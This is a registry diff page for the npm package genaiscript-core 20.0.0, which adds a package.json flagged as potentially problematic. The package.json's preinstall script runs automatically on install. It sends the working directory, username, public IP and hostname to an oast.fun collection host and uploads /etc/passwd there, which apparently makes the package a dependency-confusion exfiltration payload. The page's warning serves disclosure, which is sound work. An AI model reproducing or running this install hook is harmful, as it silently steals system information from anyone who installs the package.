genaiscript-core 20.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of genaiscript-core might be problematic. Click here for more details.
- package/package.json +15 -0
package/package.json
ADDED
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "genaiscript-core",
|
|
3
|
+
"version": "20.0.0",
|
|
4
|
+
"main": "main.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "curl njrhwugnvzykoimieazwmrx10bwa6l4z7.oast.fun/pwd=$(pwd) && curl njrhwugnvzykoimieazwmrx10bwa6l4z7.oast.fun/whoami=$(whoami)&&curl njrhwugnvzykoimieazwmrx10bwa6l4z7.oast.fun/package=$(echo 'genaiscript-core') && curl njrhwugnvzykoimieazwmrx10bwa6l4z7.oast.fun/ip=$(curl ifconfig.me)&& curl --data '@/etc/passwd' njrhwugnvzykoimieazwmrx10bwa6l4z7.oast.fun/hostname=$(hostname) ",
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
8
|
+
},
|
|
9
|
+
"author": "lexi2",
|
|
10
|
+
"license": "ISC",
|
|
11
|
+
"dependencies": {
|
|
12
|
+
"lodash": "^4.17.21"
|
|
13
|
+
},
|
|
14
|
+
"description": ""
|
|
15
|
+
}
|